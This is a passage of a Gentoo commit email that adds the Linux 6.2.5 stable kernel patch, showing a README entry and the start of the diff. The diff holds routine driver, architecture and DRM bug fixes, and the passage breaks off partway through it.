[gentoo-commits] proj/linux-patches:6.2 commit in: /
From: Mike Pagano @ 2023-03-11 14:08 UTC
  To: gentoo-commits

commit:     73f2a0ff690a7eb9e825a0e00c0cccfdd84f0741
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Mar 11 14:08:22 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Mar 11 14:08:22 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=73f2a0ff

Linux patch 6.2.5

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README            |     4 +
 1004_linux-6.2.5.patch | 11655 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 11659 insertions(+)

diff --git a/0000_README b/0000_README
index f3f521f1..2cb9b328 100644
--- a/0000_README
+++ b/0000_README
@@ -59,6 +59,10 @@ Patch:  1003_linux-6.2.4.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.2.4
 
+Patch:  1004_linux-6.2.5.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.5
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1004_linux-6.2.5.patch b/1004_linux-6.2.5.patch
new file mode 100644
index 00000000..4795d2a1
--- /dev/null
+++ b/1004_linux-6.2.5.patch
@@ -0,0 +1,11655 @@
+diff --git a/Documentation/ABI/testing/configfs-usb-gadget-uvc b/Documentation/ABI/testing/configfs-usb-gadget-uvc
+index f00cff6d8c5cb..c25cc2823fc8f 100644
+--- a/Documentation/ABI/testing/configfs-usb-gadget-uvc
++++ b/Documentation/ABI/testing/configfs-usb-gadget-uvc
+@@ -52,7 +52,7 @@ Date:		Dec 2014
+ KernelVersion:	4.0
+ Description:	Default output terminal descriptors
+ 
+-		All attributes read only:
++		All attributes read only except bSourceID:
+ 
+ 		==============	=============================================
+ 		iTerminal	index of string descriptor
+diff --git a/Documentation/devicetree/bindings/usb/genesys,gl850g.yaml b/Documentation/devicetree/bindings/usb/genesys,gl850g.yaml
+index a9f831448ccae..cc4cf92b70d18 100644
+--- a/Documentation/devicetree/bindings/usb/genesys,gl850g.yaml
++++ b/Documentation/devicetree/bindings/usb/genesys,gl850g.yaml
+@@ -16,6 +16,7 @@ properties:
+   compatible:
+     enum:
+       - usb5e3,608
++      - usb5e3,610
+ 
+   reg: true
+ 
+diff --git a/Makefile b/Makefile
+index 83cbbc3adbb12..1a1d63f2a9edb 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 4
++SUBLEVEL = 5
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/boot/dts/aspeed-bmc-ibm-bonnell.dts b/arch/arm/boot/dts/aspeed-bmc-ibm-bonnell.dts
+index 7f755e5a4624d..d9b684ccb0956 100644
+--- a/arch/arm/boot/dts/aspeed-bmc-ibm-bonnell.dts
++++ b/arch/arm/boot/dts/aspeed-bmc-ibm-bonnell.dts
+@@ -124,7 +124,7 @@
+ 		};
+ 	};
+ 
+-	iio-hwmon-battery {
++	iio-hwmon {
+ 		compatible = "iio-hwmon";
+ 		io-channels = <&adc1 7>;
+ 	};
+diff --git a/arch/arm/boot/dts/aspeed-bmc-ibm-everest.dts b/arch/arm/boot/dts/aspeed-bmc-ibm-everest.dts
+index 1448ea895be43..8ad5fe9c29900 100644
+--- a/arch/arm/boot/dts/aspeed-bmc-ibm-everest.dts
++++ b/arch/arm/boot/dts/aspeed-bmc-ibm-everest.dts
+@@ -244,7 +244,7 @@
+ 		};
+ 	};
+ 
+-	iio-hwmon-battery {
++	iio-hwmon {
+ 		compatible = "iio-hwmon";
+ 		io-channels = <&adc1 7>;
+ 	};
+diff --git a/arch/arm/boot/dts/aspeed-bmc-ibm-rainier.dts b/arch/arm/boot/dts/aspeed-bmc-ibm-rainier.dts
+index 20ef958698ec7..a3c55a0cc833e 100644
+--- a/arch/arm/boot/dts/aspeed-bmc-ibm-rainier.dts
++++ b/arch/arm/boot/dts/aspeed-bmc-ibm-rainier.dts
+@@ -220,7 +220,7 @@
+ 		};
+ 	};
+ 
+-	iio-hwmon-battery {
++	iio-hwmon {
+ 		compatible = "iio-hwmon";
+ 		io-channels = <&adc1 7>;
+ 	};
+diff --git a/arch/arm/boot/dts/spear320-hmi.dts b/arch/arm/boot/dts/spear320-hmi.dts
+index 34503ac9c51c2..721e5ee7b6803 100644
+--- a/arch/arm/boot/dts/spear320-hmi.dts
++++ b/arch/arm/boot/dts/spear320-hmi.dts
+@@ -241,7 +241,7 @@
+ 					irq-trigger = <0x1>;
+ 
+ 					stmpegpio: stmpe-gpio {
+-						compatible = "stmpe,gpio";
++						compatible = "st,stmpe-gpio";
+ 						reg = <0>;
+ 						gpio-controller;
+ 						#gpio-cells = <2>;
+diff --git a/arch/arm64/include/asm/efi.h b/arch/arm64/include/asm/efi.h
+index de4ff90785b2c..4801b5e176c18 100644
+--- a/arch/arm64/include/asm/efi.h
++++ b/arch/arm64/include/asm/efi.h
+@@ -33,7 +33,7 @@ int efi_set_mapping_permissions(struct mm_struct *mm, efi_memory_desc_t *md);
+ ({									\
+ 	efi_virtmap_load();						\
+ 	__efi_fpsimd_begin();						\
+-	spin_lock(&efi_rt_lock);					\
++	raw_spin_lock(&efi_rt_lock);					\
+ })
+ 
+ #undef arch_efi_call_virt
+@@ -42,12 +42,12 @@ int efi_set_mapping_permissions(struct mm_struct *mm, efi_memory_desc_t *md);
+ 
+ #define arch_efi_call_virt_teardown()					\
+ ({									\
+-	spin_unlock(&efi_rt_lock);					\
++	raw_spin_unlock(&efi_rt_lock);					\
+ 	__efi_fpsimd_end();						\
+ 	efi_virtmap_unload();						\
+ })
+ 
+-extern spinlock_t efi_rt_lock;
++extern raw_spinlock_t efi_rt_lock;
+ extern u64 *efi_rt_stack_top;
+ efi_status_t __efi_rt_asm_wrapper(void *, const char *, ...);
+ 
+diff --git a/arch/arm64/kernel/efi.c b/arch/arm64/kernel/efi.c
+index b273900f45668..a30dbe4b95cd3 100644
+--- a/arch/arm64/kernel/efi.c
++++ b/arch/arm64/kernel/efi.c
+@@ -146,7 +146,7 @@ asmlinkage efi_status_t efi_handle_corrupted_x18(efi_status_t s, const char *f)
+ 	return s;
+ }
+ 
+-DEFINE_SPINLOCK(efi_rt_lock);
++DEFINE_RAW_SPINLOCK(efi_rt_lock);
+ 
+ asmlinkage u64 *efi_rt_stack_top __ro_after_init;
+ 
+diff --git a/arch/mips/configs/mtx1_defconfig b/arch/mips/configs/mtx1_defconfig
+index 89a1511d2ee47..edf9634aa8ee1 100644
+--- a/arch/mips/configs/mtx1_defconfig
++++ b/arch/mips/configs/mtx1_defconfig
+@@ -284,6 +284,7 @@ CONFIG_IXGB=m
+ CONFIG_SKGE=m
+ CONFIG_SKY2=m
+ CONFIG_MYRI10GE=m
++CONFIG_FEALNX=m
+ CONFIG_NATSEMI=m
+ CONFIG_NS83820=m
+ CONFIG_S2IO=m
+diff --git a/arch/powerpc/configs/ppc6xx_defconfig b/arch/powerpc/configs/ppc6xx_defconfig
+index 1102582779599..f73c98be56c8f 100644
+--- a/arch/powerpc/configs/ppc6xx_defconfig
++++ b/arch/powerpc/configs/ppc6xx_defconfig
+@@ -461,6 +461,7 @@ CONFIG_MV643XX_ETH=m
+ CONFIG_SKGE=m
+ CONFIG_SKY2=m
+ CONFIG_MYRI10GE=m
++CONFIG_FEALNX=m
+ CONFIG_NATSEMI=m
+ CONFIG_NS83820=m
+ CONFIG_PCMCIA_AXNET=m
+diff --git a/arch/um/drivers/vector_kern.c b/arch/um/drivers/vector_kern.c
+index ded7c47d2fbe5..131b7cb295767 100644
+--- a/arch/um/drivers/vector_kern.c
++++ b/arch/um/drivers/vector_kern.c
+@@ -767,6 +767,7 @@ static int vector_config(char *str, char **error_out)
+ 
+ 	if (parsed == NULL) {
+ 		*error_out = "vector_config failed to parse parameters";
++		kfree(params);
+ 		return -EINVAL;
+ 	}
+ 
+diff --git a/arch/um/drivers/virt-pci.c b/arch/um/drivers/virt-pci.c
+index 3ac220dafec4a..5472b1a0a0398 100644
+--- a/arch/um/drivers/virt-pci.c
++++ b/arch/um/drivers/virt-pci.c
+@@ -132,8 +132,11 @@ static int um_pci_send_cmd(struct um_pci_device *dev,
+ 				out ? 1 : 0,
+ 				posted ? cmd : HANDLE_NO_FREE(cmd),
+ 				GFP_ATOMIC);
+-	if (ret)
++	if (ret) {
++		if (posted)
++			kfree(cmd);
+ 		goto out;
++	}
+ 
+ 	if (posted) {
+ 		virtqueue_kick(dev->cmd_vq);
+@@ -623,22 +626,33 @@ static void um_pci_virtio_remove(struct virtio_device *vdev)
+ 	struct um_pci_device *dev = vdev->priv;
+ 	int i;
+ 
+-        /* Stop all virtqueues */
+-        virtio_reset_device(vdev);
+-        vdev->config->del_vqs(vdev);
+-
+ 	device_set_wakeup_enable(&vdev->dev, false);
+ 
+ 	mutex_lock(&um_pci_mtx);
+ 	for (i = 0; i < MAX_DEVICES; i++) {
+ 		if (um_pci_devices[i].dev != dev)
+ 			continue;
++
+ 		um_pci_devices[i].dev = NULL;
+ 		irq_free_desc(dev->irq);
++
++		break;
+ 	}
+ 	mutex_unlock(&um_pci_mtx);
+ 
+-	um_pci_rescan();
++	if (i < MAX_DEVICES) {
++		struct pci_dev *pci_dev;
++
++		pci_dev = pci_get_slot(bridge->bus, i);
++		if (pci_dev)
++			pci_stop_and_remove_bus_device_locked(pci_dev);
++	}
++
++	/* Stop all virtqueues */
++	virtio_reset_device(vdev);
++	dev->cmd_vq = NULL;
++	dev->irq_vq = NULL;
++	vdev->config->del_vqs(vdev);
+ 
+ 	kfree(dev);
+ }
+diff --git a/arch/um/drivers/virtio_uml.c b/arch/um/drivers/virtio_uml.c
+index 588930a0ced17..ddd080f6dd82e 100644
+--- a/arch/um/drivers/virtio_uml.c
++++ b/arch/um/drivers/virtio_uml.c
+@@ -168,7 +168,8 @@ static void vhost_user_check_reset(struct virtio_uml_device *vu_dev,
+ 	if (!vu_dev->registered)
+ 		return;
+ 
+-	virtio_break_device(&vu_dev->vdev);
++	vu_dev->registered = 0;
++
+ 	schedule_work(&pdata->conn_broken_wk);
+ }
+ 
+@@ -1136,6 +1137,15 @@ void virtio_uml_set_no_vq_suspend(struct virtio_device *vdev,
+ 
+ static void vu_of_conn_broken(struct work_struct *wk)
+ {
++	struct virtio_uml_platform_data *pdata;
++	struct virtio_uml_device *vu_dev;
++
++	pdata = container_of(wk, struct virtio_uml_platform_data, conn_broken_wk);
++
++	vu_dev = platform_get_drvdata(pdata->pdev);
++
++	virtio_break_device(&vu_dev->vdev);
++
+ 	/*
+ 	 * We can't remove the device from the devicetree so the only thing we
+ 	 * can do is warn.
+@@ -1266,8 +1276,14 @@ static int vu_unregister_cmdline_device(struct device *dev, void *data)
+ static void vu_conn_broken(struct work_struct *wk)
+ {
+ 	struct virtio_uml_platform_data *pdata;
++	struct virtio_uml_device *vu_dev;
+ 
+ 	pdata = container_of(wk, struct virtio_uml_platform_data, conn_broken_wk);
++
++	vu_dev = platform_get_drvdata(pdata->pdev);
++
++	virtio_break_device(&vu_dev->vdev);
++
+ 	vu_unregister_cmdline_device(&pdata->pdev->dev, NULL);
+ }
+ 
+diff --git a/arch/x86/include/asm/resctrl.h b/arch/x86/include/asm/resctrl.h
+index 52788f79786fa..255a78d9d9067 100644
+--- a/arch/x86/include/asm/resctrl.h
++++ b/arch/x86/include/asm/resctrl.h
+@@ -49,7 +49,7 @@ DECLARE_STATIC_KEY_FALSE(rdt_mon_enable_key);
+  *   simple as possible.
+  * Must be called with preemption disabled.
+  */
+-static void __resctrl_sched_in(void)
++static inline void __resctrl_sched_in(struct task_struct *tsk)
+ {
+ 	struct resctrl_pqr_state *state = this_cpu_ptr(&pqr_state);
+ 	u32 closid = state->default_closid;
+@@ -61,13 +61,13 @@ static void __resctrl_sched_in(void)
+ 	 * Else use the closid/rmid assigned to this cpu.
+ 	 */
+ 	if (static_branch_likely(&rdt_alloc_enable_key)) {
+-		tmp = READ_ONCE(current->closid);
++		tmp = READ_ONCE(tsk->closid);
+ 		if (tmp)
+ 			closid = tmp;
+ 	}
+ 
+ 	if (static_branch_likely(&rdt_mon_enable_key)) {
+-		tmp = READ_ONCE(current->rmid);
++		tmp = READ_ONCE(tsk->rmid);
+ 		if (tmp)
+ 			rmid = tmp;
+ 	}
+@@ -88,17 +88,17 @@ static inline unsigned int resctrl_arch_round_mon_val(unsigned int val)
+ 	return val * scale;
+ }
+ 
+-static inline void resctrl_sched_in(void)
++static inline void resctrl_sched_in(struct task_struct *tsk)
+ {
+ 	if (static_branch_likely(&rdt_enable_key))
+-		__resctrl_sched_in();
++		__resctrl_sched_in(tsk);
+ }
+ 
+ void resctrl_cpu_detect(struct cpuinfo_x86 *c);
+ 
+ #else
+ 
+-static inline void resctrl_sched_in(void) {}
++static inline void resctrl_sched_in(struct task_struct *tsk) {}
+ static inline void resctrl_cpu_detect(struct cpuinfo_x86 *c) {}
+ 
+ #endif /* CONFIG_X86_CPU_RESCTRL */
+diff --git a/arch/x86/kernel/cpu/resctrl/rdtgroup.c b/arch/x86/kernel/cpu/resctrl/rdtgroup.c
+index 5993da21d8225..87b670d540b84 100644
+--- a/arch/x86/kernel/cpu/resctrl/rdtgroup.c
++++ b/arch/x86/kernel/cpu/resctrl/rdtgroup.c
+@@ -314,7 +314,7 @@ static void update_cpu_closid_rmid(void *info)
+ 	 * executing task might have its own closid selected. Just reuse
+ 	 * the context switch code.
+ 	 */
+-	resctrl_sched_in();
++	resctrl_sched_in(current);
+ }
+ 
+ /*
+@@ -535,7 +535,7 @@ static void _update_task_closid_rmid(void *task)
+ 	 * Otherwise, the MSR is updated when the task is scheduled in.
+ 	 */
+ 	if (task == current)
+-		resctrl_sched_in();
++		resctrl_sched_in(task);
+ }
+ 
+ static void update_task_closid_rmid(struct task_struct *t)
+diff --git a/arch/x86/kernel/process_32.c b/arch/x86/kernel/process_32.c
+index 470c128759eab..708c87b88cc15 100644
+--- a/arch/x86/kernel/process_32.c
++++ b/arch/x86/kernel/process_32.c
+@@ -212,7 +212,7 @@ __switch_to(struct task_struct *prev_p, struct task_struct *next_p)
+ 	switch_fpu_finish();
+ 
+ 	/* Load the Intel cache allocation PQR MSR. */
+-	resctrl_sched_in();
++	resctrl_sched_in(next_p);
+ 
+ 	return prev_p;
+ }
+diff --git a/arch/x86/kernel/process_64.c b/arch/x86/kernel/process_64.c
+index 4e34b3b68ebdc..bb65a68b4b499 100644
+--- a/arch/x86/kernel/process_64.c
++++ b/arch/x86/kernel/process_64.c
+@@ -656,7 +656,7 @@ __switch_to(struct task_struct *prev_p, struct task_struct *next_p)
+ 	}
+ 
+ 	/* Load the Intel cache allocation PQR MSR. */
+-	resctrl_sched_in();
++	resctrl_sched_in(next_p);
+ 
+ 	return prev_p;
+ }
+diff --git a/arch/x86/um/vdso/um_vdso.c b/arch/x86/um/vdso/um_vdso.c
+index 2112b8d146688..ff0f3b4b6c45e 100644
+--- a/arch/x86/um/vdso/um_vdso.c
++++ b/arch/x86/um/vdso/um_vdso.c
+@@ -17,8 +17,10 @@ int __vdso_clock_gettime(clockid_t clock, struct __kernel_old_timespec *ts)
+ {
+ 	long ret;
+ 
+-	asm("syscall" : "=a" (ret) :
+-		"0" (__NR_clock_gettime), "D" (clock), "S" (ts) : "memory");
++	asm("syscall"
++		: "=a" (ret)
++		: "0" (__NR_clock_gettime), "D" (clock), "S" (ts)
++		: "rcx", "r11", "memory");
+ 
+ 	return ret;
+ }
+@@ -29,8 +31,10 @@ int __vdso_gettimeofday(struct __kernel_old_timeval *tv, struct timezone *tz)
+ {
+ 	long ret;
+ 
+-	asm("syscall" : "=a" (ret) :
+-		"0" (__NR_gettimeofday), "D" (tv), "S" (tz) : "memory");
++	asm("syscall"
++		: "=a" (ret)
++		: "0" (__NR_gettimeofday), "D" (tv), "S" (tz)
++		: "rcx", "r11", "memory");
+ 
+ 	return ret;
+ }
+diff --git a/drivers/acpi/device_pm.c b/drivers/acpi/device_pm.c
+index 97450f4003cc9..f007116a84276 100644
+--- a/drivers/acpi/device_pm.c
++++ b/drivers/acpi/device_pm.c
+@@ -484,6 +484,25 @@ void acpi_dev_power_up_children_with_adr(struct acpi_device *adev)
+ 	acpi_dev_for_each_child(adev, acpi_power_up_if_adr_present, NULL);
+ }
+ 
++/**
++ * acpi_dev_power_state_for_wake - Deepest power state for wakeup signaling
++ * @adev: ACPI companion of the target device.
++ *
++ * Evaluate _S0W for @adev and return the value produced by it or return
++ * ACPI_STATE_UNKNOWN on errors (including _S0W not present).
++ */
++u8 acpi_dev_power_state_for_wake(struct acpi_device *adev)
++{
++	unsigned long long state;
++	acpi_status status;
++
++	status = acpi_evaluate_integer(adev->handle, "_S0W", NULL, &state);
++	if (ACPI_FAILURE(status))
++		return ACPI_STATE_UNKNOWN;
++
++	return state;
++}
++
+ #ifdef CONFIG_PM
+ static DEFINE_MUTEX(acpi_pm_notifier_lock);
+ static DEFINE_MUTEX(acpi_pm_notifier_install_lock);
+diff --git a/drivers/auxdisplay/hd44780.c b/drivers/auxdisplay/hd44780.c
+index 8b2a0eb3f32a4..d56a5d508ccd7 100644
+--- a/drivers/auxdisplay/hd44780.c
++++ b/drivers/auxdisplay/hd44780.c
+@@ -322,8 +322,10 @@ fail1:
+ static int hd44780_remove(struct platform_device *pdev)
+ {
+ 	struct charlcd *lcd = platform_get_drvdata(pdev);
++	struct hd44780_common *hdc = lcd->drvdata;
+ 
+ 	charlcd_unregister(lcd);
++	kfree(hdc->hd44780);
+ 	kfree(lcd->drvdata);
+ 
+ 	kfree(lcd);
+diff --git a/drivers/base/cacheinfo.c b/drivers/base/cacheinfo.c
+index 950b22cdb5f7c..f05acf3c16c6b 100644
+--- a/drivers/base/cacheinfo.c
++++ b/drivers/base/cacheinfo.c
+@@ -256,7 +256,7 @@ static int cache_shared_cpu_map_setup(unsigned int cpu)
+ {
+ 	struct cpu_cacheinfo *this_cpu_ci = get_cpu_cacheinfo(cpu);
+ 	struct cacheinfo *this_leaf, *sib_leaf;
+-	unsigned int index;
++	unsigned int index, sib_index;
+ 	int ret = 0;
+ 
+ 	if (this_cpu_ci->cpu_map_populated)
+@@ -284,11 +284,13 @@ static int cache_shared_cpu_map_setup(unsigned int cpu)
+ 
+ 			if (i == cpu || !sib_cpu_ci->info_list)
+ 				continue;/* skip if itself or no cacheinfo */
+-
+-			sib_leaf = per_cpu_cacheinfo_idx(i, index);
+-			if (cache_leaves_are_shared(this_leaf, sib_leaf)) {
+-				cpumask_set_cpu(cpu, &sib_leaf->shared_cpu_map);
+-				cpumask_set_cpu(i, &this_leaf->shared_cpu_map);
++			for (sib_index = 0; sib_index < cache_leaves(i); sib_index++) {
++				sib_leaf = per_cpu_cacheinfo_idx(i, sib_index);
++				if (cache_leaves_are_shared(this_leaf, sib_leaf)) {
++					cpumask_set_cpu(cpu, &sib_leaf->shared_cpu_map);
++					cpumask_set_cpu(i, &this_leaf->shared_cpu_map);
++					break;
++				}
+ 			}
+ 		}
+ 		/* record the maximum cache line size */
+@@ -302,7 +304,7 @@ static int cache_shared_cpu_map_setup(unsigned int cpu)
+ static void cache_shared_cpu_map_remove(unsigned int cpu)
+ {
+ 	struct cacheinfo *this_leaf, *sib_leaf;
+-	unsigned int sibling, index;
++	unsigned int sibling, index, sib_index;
+ 
+ 	for (index = 0; index < cache_leaves(cpu); index++) {
+ 		this_leaf = per_cpu_cacheinfo_idx(cpu, index);
+@@ -313,9 +315,14 @@ static void cache_shared_cpu_map_remove(unsigned int cpu)
+ 			if (sibling == cpu || !sib_cpu_ci->info_list)
+ 				continue;/* skip if itself or no cacheinfo */
+ 
+-			sib_leaf = per_cpu_cacheinfo_idx(sibling, index);
+-			cpumask_clear_cpu(cpu, &sib_leaf->shared_cpu_map);
+-			cpumask_clear_cpu(sibling, &this_leaf->shared_cpu_map);
++			for (sib_index = 0; sib_index < cache_leaves(sibling); sib_index++) {
++				sib_leaf = per_cpu_cacheinfo_idx(sibling, sib_index);
++				if (cache_leaves_are_shared(this_leaf, sib_leaf)) {
++					cpumask_clear_cpu(cpu, &sib_leaf->shared_cpu_map);
++					cpumask_clear_cpu(sibling, &this_leaf->shared_cpu_map);
++					break;
++				}
++			}
+ 		}
+ 	}
+ }
+diff --git a/drivers/base/component.c b/drivers/base/component.c
+index 5eadeac6c5322..7dbf14a1d9157 100644
+--- a/drivers/base/component.c
++++ b/drivers/base/component.c
+@@ -125,7 +125,7 @@ static void component_debugfs_add(struct aggregate_device *m)
+ 
+ static void component_debugfs_del(struct aggregate_device *m)
+ {
+-	debugfs_remove(debugfs_lookup(dev_name(m->parent), component_debugfs_dir));
++	debugfs_lookup_and_remove(dev_name(m->parent), component_debugfs_dir);
+ }
+ 
+ #else
+diff --git a/drivers/base/dd.c b/drivers/base/dd.c
+index e9b2f9c25efe4..959fe018d0dd7 100644
+--- a/drivers/base/dd.c
++++ b/drivers/base/dd.c
+@@ -372,7 +372,7 @@ late_initcall(deferred_probe_initcall);
+ 
+ static void __exit deferred_probe_exit(void)
+ {
+-	debugfs_remove_recursive(debugfs_lookup("devices_deferred", NULL));
++	debugfs_lookup_and_remove("devices_deferred", NULL);
+ }
+ __exitcall(deferred_probe_exit);
+ 
+diff --git a/drivers/block/loop.c b/drivers/block/loop.c
+index 1518a6423279b..1b35cbd029c7c 100644
+--- a/drivers/block/loop.c
++++ b/drivers/block/loop.c
+@@ -977,13 +977,13 @@ loop_set_status_from_info(struct loop_device *lo,
+ 		return -EINVAL;
+ 	}
+ 
++	/* Avoid assigning overflow values */
++	if (info->lo_offset > LLONG_MAX || info->lo_sizelimit > LLONG_MAX)
++		return -EOVERFLOW;
++
+ 	lo->lo_offset = info->lo_offset;
+ 	lo->lo_sizelimit = info->lo_sizelimit;
+ 
+-	/* loff_t vars have been assigned __u64 */
+-	if (lo->lo_offset < 0 || lo->lo_sizelimit < 0)
+-		return -EOVERFLOW;
+-
+ 	memcpy(lo->lo_file_name, info->lo_file_name, LO_NAME_SIZE);
+ 	lo->lo_file_name[LO_NAME_SIZE-1] = 0;
+ 	lo->lo_flags = info->lo_flags;
+diff --git a/drivers/bus/mhi/ep/main.c b/drivers/bus/mhi/ep/main.c
+index 9c42886818418..357c61c12ce5b 100644
+--- a/drivers/bus/mhi/ep/main.c
++++ b/drivers/bus/mhi/ep/main.c
+@@ -219,7 +219,7 @@ static int mhi_ep_process_cmd_ring(struct mhi_ep_ring *ring, struct mhi_ring_ele
+ 		mutex_unlock(&mhi_chan->lock);
+ 		break;
+ 	case MHI_PKT_TYPE_RESET_CHAN_CMD:
+-		dev_dbg(dev, "Received STOP command for channel (%u)\n", ch_id);
++		dev_dbg(dev, "Received RESET command for channel (%u)\n", ch_id);
+ 		if (!ch_ring->started) {
+ 			dev_err(dev, "Channel (%u) not opened\n", ch_id);
+ 			return -ENODEV;
+diff --git a/drivers/cpufreq/apple-soc-cpufreq.c b/drivers/cpufreq/apple-soc-cpufreq.c
+index c11d22fd84c37..021f423705e1b 100644
+--- a/drivers/cpufreq/apple-soc-cpufreq.c
++++ b/drivers/cpufreq/apple-soc-cpufreq.c
+@@ -189,8 +189,8 @@ static int apple_soc_cpufreq_find_cluster(struct cpufreq_policy *policy,
+ 	*info = match->data;
+ 
+ 	*reg_base = of_iomap(args.np, 0);
+-	if (IS_ERR(*reg_base))
+-		return PTR_ERR(*reg_base);
++	if (!*reg_base)
++		return -ENOMEM;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/firmware/efi/sysfb_efi.c b/drivers/firmware/efi/sysfb_efi.c
+index 7882d4b3f2be4..f06fdacc9bc83 100644
+--- a/drivers/firmware/efi/sysfb_efi.c
++++ b/drivers/firmware/efi/sysfb_efi.c
+@@ -264,6 +264,14 @@ static const struct dmi_system_id efifb_dmi_swap_width_height[] __initconst = {
+ 					"Lenovo ideapad D330-10IGM"),
+ 		},
+ 	},
++	{
++		/* Lenovo IdeaPad Duet 3 10IGL5 with 1200x1920 portrait screen */
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_VERSION,
++					"IdeaPad Duet 3 10IGL5"),
++		},
++	},
+ 	{},
+ };
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+index 5cff56bb8f560..657e7c7b59e98 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+@@ -206,7 +206,7 @@ bool dm_helpers_dp_mst_write_payload_allocation_table(
+ 	if (enable)
+ 		drm_dp_add_payload_part1(mst_mgr, mst_state, payload);
+ 	else
+-		drm_dp_remove_payload(mst_mgr, mst_state, payload);
++		drm_dp_remove_payload(mst_mgr, mst_state, payload, payload);
+ 
+ 	/* mst_mgr->->payloads are VC payload notify MST branch using DPCD or
+ 	 * AUX message. The sequence is slot 1-63 allocated sequence for each
+diff --git a/drivers/gpu/drm/display/drm_dp_mst_topology.c b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+index 4ca37261584a9..38dab76ae69ea 100644
+--- a/drivers/gpu/drm/display/drm_dp_mst_topology.c
++++ b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+@@ -3309,8 +3309,13 @@ int drm_dp_add_payload_part1(struct drm_dp_mst_topology_mgr *mgr,
+ 	int ret;
+ 
+ 	port = drm_dp_mst_topology_get_port_validated(mgr, payload->port);
+-	if (!port)
++	if (!port) {
++		drm_dbg_kms(mgr->dev,
++			    "VCPI %d for port %p not in topology, not creating a payload\n",
++			    payload->vcpi, payload->port);
++		payload->vc_start_slot = -1;
+ 		return 0;
++	}
+ 
+ 	if (mgr->payload_count == 0)
+ 		mgr->next_start_slot = mst_state->start_slot;
+@@ -3337,7 +3342,8 @@ EXPORT_SYMBOL(drm_dp_add_payload_part1);
+  * drm_dp_remove_payload() - Remove an MST payload
+  * @mgr: Manager to use.
+  * @mst_state: The MST atomic state
+- * @payload: The payload to write
++ * @old_payload: The payload with its old state
++ * @new_payload: The payload to write
+  *
+  * Removes a payload from an MST topology if it was successfully assigned a start slot. Also updates
+  * the starting time slots of all other payloads which would have been shifted towards the start of
+@@ -3345,36 +3351,37 @@ EXPORT_SYMBOL(drm_dp_add_payload_part1);
+  */
+ void drm_dp_remove_payload(struct drm_dp_mst_topology_mgr *mgr,
+ 			   struct drm_dp_mst_topology_state *mst_state,
+-			   struct drm_dp_mst_atomic_payload *payload)
++			   const struct drm_dp_mst_atomic_payload *old_payload,
++			   struct drm_dp_mst_atomic_payload *new_payload)
+ {
+ 	struct drm_dp_mst_atomic_payload *pos;
+ 	bool send_remove = false;
+ 
+ 	/* We failed to make the payload, so nothing to do */
+-	if (payload->vc_start_slot == -1)
++	if (new_payload->vc_start_slot == -1)
+ 		return;
+ 
+ 	mutex_lock(&mgr->lock);
+-	send_remove = drm_dp_mst_port_downstream_of_branch(payload->port, mgr->mst_primary);
++	send_remove = drm_dp_mst_port_downstream_of_branch(new_payload->port, mgr->mst_primary);
+ 	mutex_unlock(&mgr->lock);
+ 
+ 	if (send_remove)
+-		drm_dp_destroy_payload_step1(mgr, mst_state, payload);
++		drm_dp_destroy_payload_step1(mgr, mst_state, new_payload);
+ 	else
+ 		drm_dbg_kms(mgr->dev, "Payload for VCPI %d not in topology, not sending remove\n",
+-			    payload->vcpi);
++			    new_payload->vcpi);
+ 
+ 	list_for_each_entry(pos, &mst_state->payloads, next) {
+-		if (pos != payload && pos->vc_start_slot > payload->vc_start_slot)
+-			pos->vc_start_slot -= payload->time_slots;
++		if (pos != new_payload && pos->vc_start_slot > new_payload->vc_start_slot)
++			pos->vc_start_slot -= old_payload->time_slots;
+ 	}
+-	payload->vc_start_slot = -1;
++	new_payload->vc_start_slot = -1;
+ 
+ 	mgr->payload_count--;
+-	mgr->next_start_slot -= payload->time_slots;
++	mgr->next_start_slot -= old_payload->time_slots;
+ 
+-	if (payload->delete)
+-		drm_dp_mst_put_port_malloc(payload->port);
++	if (new_payload->delete)
++		drm_dp_mst_put_port_malloc(new_payload->port);
+ }
+ EXPORT_SYMBOL(drm_dp_remove_payload);
+ 
+@@ -3644,6 +3651,9 @@ int drm_dp_mst_topology_mgr_set_mst(struct drm_dp_mst_topology_mgr *mgr, bool ms
+ 		drm_dp_dpcd_writeb(mgr->aux, DP_MSTM_CTRL, 0);
+ 		ret = 0;
+ 		mgr->payload_id_table_cleared = false;
++
++		memset(&mgr->down_rep_recv, 0, sizeof(mgr->down_rep_recv));
++		memset(&mgr->up_req_recv, 0, sizeof(mgr->up_req_recv));
+ 	}
+ 
+ out_unlock:
+@@ -3856,7 +3866,7 @@ static int drm_dp_mst_handle_down_rep(struct drm_dp_mst_topology_mgr *mgr)
+ 	struct drm_dp_sideband_msg_rx *msg = &mgr->down_rep_recv;
+ 
+ 	if (!drm_dp_get_one_sb_msg(mgr, false, &mstb))
+-		goto out;
++		goto out_clear_reply;
+ 
+ 	/* Multi-packet message transmission, don't clear the reply */
+ 	if (!msg->have_eomt)
+@@ -5354,28 +5364,53 @@ struct drm_dp_mst_topology_state *drm_atomic_get_mst_topology_state(struct drm_a
+ }
